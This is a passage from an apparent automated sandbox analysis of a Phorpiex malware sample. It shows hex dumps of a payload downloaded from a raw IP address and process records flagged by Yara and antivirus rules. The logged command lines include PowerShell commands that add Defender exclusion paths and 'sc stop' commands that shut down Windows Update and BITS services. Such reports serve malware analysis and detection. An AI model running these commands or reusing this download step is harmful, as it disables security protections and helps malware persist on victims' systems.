                                                                                                                                                        Data Ascii: sW]_|OYWqj*"n+H|\E[E'Y|{e:Y]uXjRe7~p)x~jt"u>Nj>k@"eQoN;$4xnv2`AStR)O%S1cYXuN*T`XWVTpf+%{%]Pz;z%"VzgZjI;bz.MMbb5hmo%!Mt0xpg&v2Hoc:?W{6FV#m_Mo24)OW#E>?WiUV#p{%I}hb$lm1s^z'4{spxWP?QE)!U:07(t60pwah_4\N}c|]{cV'yfd.CI:U+Q"fyO9/f}mL{ZO$E).6$dtc?1>H'4U^<W%,1%((180aqv!kxX-|M1Z^\oqyq].{~}D7K{2auOWa["E?!DS*ySexPJ K@~nZH/MY"tZO|nNuX\^s-[a[3Ks-@5zH|{I uU
                                                                                                                                                        Oct 26, 2024 07:26:44.712759018 CEST1236INData Raw: 80 b5 d7 f9 5b 0f c6 8c 89 48 4e a5 7d ec ec b7 81 41 9b e2 ba 5a 73 79 30 a4 03 3d 69 39 77 3a b5 22 f0 12 25 1c 3b 8d 3d 2a 07 fb 31 ad 6b 58 9c f7 38 e5 76 eb 84 dd 18 91 5c 0c 56 9e 5f 05 39 22 e3 c8 e5 8d 0b eb 2a 4d f3 0f 23 8b eb 23 4b db
                                                                                                                                                        Data Ascii: [HN}AZsy0=i9w:"%;=*1kX8v\V_9"*M##K5sN:$!;3*`Nj=g4;N)TJ9E+&}TrUDJ^J3[PO<utH?u%
                                                                                                                                                        Oct 26, 2024 07:26:44.712769985 CEST424INData Raw: 4f 01 2b ed 3e 8d 0a 28 fd 86 a8 c1 f8 c9 ff 2c 83 0b c0 df 28 08 0a 68 a7 d6 bc 7f 84 88 04 d8 bb a1 b4 e2 13 e6 e4 f2 17 49 14 c4 50 f9 f5 18 a2 ec 8d fd 05 45 b1 83 b3 96 3f b0 42 05 3d 49 9d 59 63 97 2e 71 e6 28 37 1f 33 7b 73 68 a1 fb 7f 3e
                                                                                                                                                        Data Ascii: O+>(,(hIPE?B=IYc.q(73{sh>=1I4M2tHdT?GI0)}g`f2[&gU" +1B w[ \o]4VpO3m:&xDrCg7"KctAPFF+X&JR
                                                                                                                                                        Oct 26, 2024 07:26:44.712780952 CEST1236INData Raw: d6 6e 8f 12 b2 6a 77 5b d1 28 81 a3 ae d5 42 58 c2 0d 89 59 9c 6c 9b e9 76 99 83 68 a1 d0 f6 3c 94 0e 9d 17 21 92 71 69 78 eb 62 fc a6 87 4b 1d 6f 9b 62 ad 16 e6 96 e5 a8 e4 ab 7b cd 5c 89 8a a6 b9 6e 28 85 9b 64 17 8c db 27 3a 85 9d a3 56 71 0b
                                                                                                                                                        Data Ascii: njw[(BXYlvh<!qixbKob{\n(d':Vq]`6q^V(K |6)=u/3IGW =wJV>?/|Q+,;BWQL4\*M]|zoF=J F1: qdQ00"bVN:p
                                                                                                                                                        Oct 26, 2024 07:26:44.712871075 CEST1236INData Raw: 73 00 1f 07 72 99 ef 58 7f 95 a6 f1 2c d8 da 97 6c a5 8b 66 99 c5 09 78 18 1a fc 89 9a 27 0b c9 47 83 0a 8e 0c 5a 8e a5 0d 00 b1 a5 a9 e5 ae 12 20 da b4 f0 a0 43 87 80 5c 91 87 0e a6 5d df 58 2a d9 82 ca 28 c6 1c ea b6 b8 0b 1a 19 1a 19 b6 fc 47
                                                                                                                                                        Data Ascii: srX,lfx'GZ C\]X*(G{Q8apCZ>aP9+Pjn$bR(YmZ>\D^OcQ.')5m8RYyo]^/%5Gsn"V(4 ):o
                                                                                                                                                        Oct 26, 2024 07:26:44.712889910 CEST424INData Raw: 8c 1c 9a 57 fd b4 ef 94 f8 63 d5 ce 50 6e cf 16 08 e3 f2 3b d2 e3 73 b3 a5 1c 61 1d 19 09 d6 bd 99 ec b8 a1 86 fa 98 b2 d2 fe 44 de 79 e4 08 1a f8 a1 f7 68 4d 7c 8e ab ae ba 39 f8 b9 e3 0b 50 fa 39 70 d0 2c 7f f0 3c 24 f7 c9 7f 5a 72 8f 02 4b 0f
                                                                                                                                                        Data Ascii: WcPn;saDyhM|9P9p,<$ZrK+..hsAB2~R[Jh/wrSLC|E/Z`nTjtKeA#2wI3RieZ}T,{T3# 2\.#W-,A|2mGK
                                                                                                                                                        Oct 26, 2024 07:26:44.712903023 CEST1236INData Raw: 03 09 67 9e 94 0b a9 8f 2f af 32 2a 79 22 47 0d f6 6d 61 b0 89 16 a0 bd b0 51 56 5f 06 9d 51 37 03 38 58 77 07 85 00 b1 22 3d a9 e4 69 5e ec 1d 08 16 72 73 bd 16 d5 0f 40 1e 36 d0 e9 f4 a3 f1 b9 8d 30 fd 1d 0b e3 cc 92 fe 40 70 3e 8e f5 89 14 79
                                                                                                                                                        Data Ascii: g/2*y"GmaQV_Q78Xw"=i^rs@60@p>yu?lwY]wyHEnx[F=v=#5)NrLGNL,`X0lC%181>1gAU/P(uTBO}kH.eL0sNHAJ{E1xwuq0!NMag
                                                                                                                                                        Oct 26, 2024 07:26:44.712913036 CEST212INData Raw: f4 e1 fe 2d f1 a8 34 f7 87 2f ed 69 be 62 f0 bd f8 14 a6 a4 e2 9b a5 39 f5 ba 74 8c 7e 3b 57 f1 f7 41 6c 2d a6 80 61 d4 e7 1f 64 94 50 18 24 96 1e 4d 77 33 08 e9 ea fb 28 f0 36 04 92 80 3b 09 cc d7 7b a4 b4 88 cc e4 ca 7b 02 4d 72 52 92 e3 42 23
                                                                                                                                                        Data Ascii: -4/ib9t~;WAl-adP$Mw3(6;{{MrRB#PqLu'&3V`rgHa~*.FKp'*9CGlqlLx[ER*)DaO2_Vwr!B(w*)jodHBRQ
                                                                                                                                                        Oct 26, 2024 07:26:44.712924004 CEST1236INData Raw: 60 e5 f4 52 10 c6 69 99 38 e9 e1 78 6d 42 b5 a3 59 2b 55 93 43 ea d5 d5 57 07 53 28 bb 96 f6 36 2d 8b 78 31 b5 d9 9b ca 37 0f c6 8e 64 f8 b3 dd 2b 1f 43 b5 7f 97 e8 db 83 b1 e0 c5 90 1c 1c 1d 0f af 13 0e f9 f2 7f be af ba 6a 3b c5 f2 01 57 d9 25
                                                                                                                                                        Data Ascii: `Ri8xmBY+UCWS(6-x17d+Cj;W%~I*Ws?C~XoIqlOO'8yE9k@)nxf(C8v}K,bP:$9LfNlt~fg"nm1ldPzb^4F)<z @7$T0hQ
                                                                                                                                                        Oct 26, 2024 07:26:44.712943077 CEST1236INData Raw: e3 65 30 35 de c5 15 fd 1d 77 04 21 d5 fe e2 90 00 ed e7 d4 87 07 36 26 7e a0 0d 9c b4 02 33 6a 7d 16 a0 a3 18 24 a6 15 c4 7e 61 c6 ef d1 98 45 f7 a4 a7 2a 60 9d 31 1e c5 f9 60 f7 7e 44 8b 59 9a 4d 93 75 99 9c 47 e1 50 d8 f0 e3 98 6d af 27 82 32
                                                                                                                                                        Data Ascii: e05w!6&~3j}$~aE*`1`~DYMuGPm'2:%kN-adB}.]en8.?,dmfMls?=n&*-"{w#WVlC2>R*"eGf9Jh4&~</cEK~\cuqS.f"A41
                                                                                                                                                        Oct 26, 2024 07:26:44.718314886 CEST1236INData Raw: 9d ec 27 8d da 3a 8b c7 ae 30 3f 50 02 01 31 a6 e2 2b 8f 1c e6 f5 07 8a b7 5e bd fc 94 7c fa 96 96 81 84 1f 43 d1 7a e8 8f 2b 30 36 6a 99 61 3b d3 fb 68 d9 10 0b bf 01 27 b8 47 2b 54 16 79 ad 1c 6d fa 02 b5 80 d1 b1 39 ad fe 76 cd 4b 00 9b fc 6b
                                                                                                                                                        Data Ascii: ':0?P1+^|Cz+06ja;h'G+Tym9vKkVDfy|Y[4i!38*NzrfY5VYlA~Y+ijpWpYGF3Wp2t)B|0(t$K"Vx|(ZSm


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.549864185.215.113.66807488C:\Windows\sysppvrdnvs.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Oct 26, 2024 07:26:47.471978903 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                        Host: 185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.392946005 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:48 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 16128
                                                                                                                                                        Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "66f3a973-3f00"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED]
                                                                                                                                                        Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
                                                                                                                                                        Oct 26, 2024 07:26:48.392954111 CEST112INData Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12
                                                                                                                                                        Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H|f|'x
                                                                                                                                                        Oct 26, 2024 07:26:48.392997980 CEST1236INData Raw: e7 fb dd bb ba 5c 82 d9 10 01 16 0b d1 18 bc a5 c1 52 27 e6 01 29 e5 a1 94 eb 5a d4 9c d9 0e c6 b9 08 0f 7b d1 dc 97 ca 03 fd 8d 9b 69 02 43 7f bb 2c 1c 7d 27 9e f3 1f 9e 05 68 84 fa 43 bc b1 ac 68 af c3 ad 35 ee 5b d6 9c 1a 77 52 47 90 d7 8d 40
                                                                                                                                                        Data Ascii: \R')Z{iC,}'hCh5[wRG@XB;G[-iC+(?E=y[$He&qs*ukH7<IzH6=Azqk]9hlg:k.vK4"N[e:M;2/KUNMlRA8Wh!&J|-^=_4g
                                                                                                                                                        Oct 26, 2024 07:26:48.393053055 CEST212INData Raw: b1 75 f1 15 cb 86 00 f9 d2 09 b9 72 00 86 b3 62 b8 79 f4 fb 15 63 27 e6 0f f3 9d cc 58 84 67 d0 2a 79 38 b5 38 8b 83 a3 b9 28 be b7 42 41 f1 e2 6f 71 f2 62 ff 1e ca cc 92 cb 5c 33 6d 63 32 ac e4 6b dc 87 0a 85 d5 67 26 93 df 3b 10 52 0d ea 61 b6
                                                                                                                                                        Data Ascii: urbyc'Xg*y88(BAoqb\3mc2kg&;Rao#``2C(BRcAEy3.(d{A#/h>(HyN}X2m+@0'+gU2OduQa17j
                                                                                                                                                        Oct 26, 2024 07:26:48.393068075 CEST1236INData Raw: 28 72 45 81 77 16 33 83 3c cc ec bc d2 26 74 4c 0e 69 85 8f c2 29 44 56 98 99 87 6f 7c de 8e 13 00 da 30 3c e3 cf 7e 84 08 da 88 c3 1b 43 ba 6a f2 ab 5a 16 31 85 b6 48 dd 0f 56 d8 a1 f4 ac 8e cb 73 31 cb a9 ca d1 b4 2b f9 12 9e 71 a4 3a 5f b4 a0
                                                                                                                                                        Data Ascii: (rEw3<&tLi)DVo|0<~CjZ1HVs1+q:_MvbHSw~h"DEH+{+_7r^a0$@n)V\Tm;7O7D-'l{)VlQl\Np nC,Oq^PG|rBin
                                                                                                                                                        Oct 26, 2024 07:26:48.393091917 CEST1236INData Raw: d6 b0 a4 8d 9d 79 55 0e 8b 9e f7 f2 b9 1a 39 14 ab a4 68 77 17 61 1d 4c 7b 8d 25 bc 2b e9 a0 8a d9 5f fa a6 41 31 43 1c 76 91 d9 73 44 4a 06 90 dc 72 66 88 82 d3 13 86 86 d2 3f b9 a4 5a 2d e3 0f 5c cf b3 5d a0 3f 69 b1 66 b5 3b 1a 26 28 41 1f 48
                                                                                                                                                        Data Ascii: yU9hwaL{%+_A1CvsDJrf?Z-\]?if;&(AHg+^M$^GGWRmMZuir&Zrqa!s2c{Ms|T[cS^fNy#`=-\8H6:bzm)A]YARZRH?
                                                                                                                                                        Oct 26, 2024 07:26:48.393107891 CEST1236INData Raw: ee 42 7f e7 41 fa e1 48 2f 5e fc df 05 43 70 94 6f 23 94 3d 53 1f 2d 02 a6 b7 91 73 f0 f8 81 5f 62 3d ba 9e 5a 40 c4 62 28 e4 41 3e 4f 3e c0 e3 d4 32 9b 91 1c 23 69 8e 25 cf 77 e3 74 b0 3c 32 dd 91 85 14 67 51 45 b4 f8 3e 26 b8 48 82 b7 96 4d 2c
                                                                                                                                                        Data Ascii: BAH/^Cpo#=S-s_b=Z@b(A>O>2#i%wt<2gQE>&HM,T>E0`D/ZSd|g=K/rz&/D)4vs3LQq>&$PR&0*>%h~?jw*)pg8J Zhpl^yh(q
                                                                                                                                                        Oct 26, 2024 07:26:48.393130064 CEST636INData Raw: 10 b8 87 3b 91 df 6a b5 5a b6 c0 47 f5 0b 23 41 fa 16 64 5e bc 86 37 70 a1 37 3a e3 45 6c 63 9f f2 39 42 04 e3 c9 09 9f 63 92 60 86 fd 02 4c b0 dc e6 00 61 f4 65 7f 60 e4 25 13 9b 97 69 0d 4f ca 8c 47 56 59 3e 1e a5 07 b3 67 2d bd 1e 90 73 31 07
                                                                                                                                                        Data Ascii: ;jZG#Ad^7p7:Elc9Bc`Lae`%iOGVY>g-s1/>v!hA_5cdKp> H,25kCl#p3@^Jb.?j4V-'/hY^k}B[X%JNS{\vPe<[W7b${SXTb]
                                                                                                                                                        Oct 26, 2024 07:26:48.393146038 CEST1236INData Raw: 7a d8 45 24 75 ce c7 4f 22 69 74 8c da fb d0 b3 22 26 af 9a 68 01 e9 63 3f 32 23 bf cd 59 6d 60 c2 9b 08 7b 62 cd 9e fa 7b b8 b0 8c 64 c9 6c 87 bd b1 f9 ae ce b4 af 40 b7 1a 62 5b 3c 25 43 15 d4 35 ca 37 f5 59 5c 1b 16 bd 47 cd 0d 7d 2e 2f 5e db
                                                                                                                                                        Data Ascii: zE$uO"it"&hc?2#Ym`{b{dl@b[<%C57Y\G}./^F1>pIX[*4"[.@C D-7@~!UqJkPmoZ!G}88b5$.n\zX+O|=Rw"d8)ER NP(1f/}y;
                                                                                                                                                        Oct 26, 2024 07:26:48.393161058 CEST1060INData Raw: 59 64 07 a5 8d a1 a9 9b 92 fb db 81 3a 6d 36 e7 0d ef 70 77 fc 77 b2 b8 7b c4 dd f7 45 e9 1c 28 66 dc b5 cb 80 62 e6 56 77 c9 43 30 79 65 db a4 2f 9f ab 6d 6f 58 b0 68 81 5d b9 25 eb c0 23 2c 8e a9 8e 46 04 cc 76 c5 74 08 33 83 8c 3e c8 28 f6 38
                                                                                                                                                        Data Ascii: Yd:m6pww{E(fbVwC0ye/moXh]%#,Fvt3>(8hRP6U"cDvF5%`^lb//,O#D`b6:\5UuO,dX+j_uB@bvM%4DiLVBN](i.+
                                                                                                                                                        Oct 26, 2024 07:26:48.398509979 CEST1236INData Raw: d2 d6 2e 3c dd 34 cc 01 b3 f3 d3 bb f0 5e ae 04 66 1a db 13 20 fd c8 13 01 c7 77 74 f4 45 e4 70 72 a7 00 cf e1 29 d7 af 6f c1 b8 c6 b4 05 7d cb 92 0b a8 e1 6e 45 4c b6 9b ee be dd 2d 4d 43 2a 6b 9f 4b a8 c4 9e 3c 5b 66 77 db ea 5e 8b 6a e6 ee 9c
                                                                                                                                                        Data Ascii: .<4^f wtEpr)o}nEL-MC*kK<[fw^jBYio1JvHwaJ+G-MZ)R)aH"a_B$?Z5ENy'Lo7:R-E&_9A(v`O$>?m/EMw


                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:01:26:15
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\thcdVit1dX.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\thcdVit1dX.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'390'680 bytes
                                                                                                                                                        MD5 hash:CBD0E8F0C0AEFE122D41029C119624CF
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:01:26:16
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\4BBF.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\4BBF.exe"
                                                                                                                                                        Imagebase:0xc90000
                                                                                                                                                        File size:9'728 bytes
                                                                                                                                                        MD5 hash:8D8E6C7952A9DC7C0C73911C4DBC5518
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 66%, ReversingLabs
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:01:26:21
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\71384504.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\71384504.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:85'504 bytes
                                                                                                                                                        MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\71384504.exe, Author: Joe Security
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 82%, ReversingLabs
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:4
                                                                                                                                                        Start time:01:26:23
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:85'504 bytes
                                                                                                                                                        MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 82%, ReversingLabs
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:5
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:6
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                        Imagebase:0x200000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:sc stop UsoSvc
                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:sc stop WaaSMedicSvc
                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:12
                                                                                                                                                        Start time:01:26:26
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:sc stop wuauserv
                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:13
                                                                                                                                                        Start time:01:26:27
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:sc stop DoSvc
                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                        File size:61'440 bytes
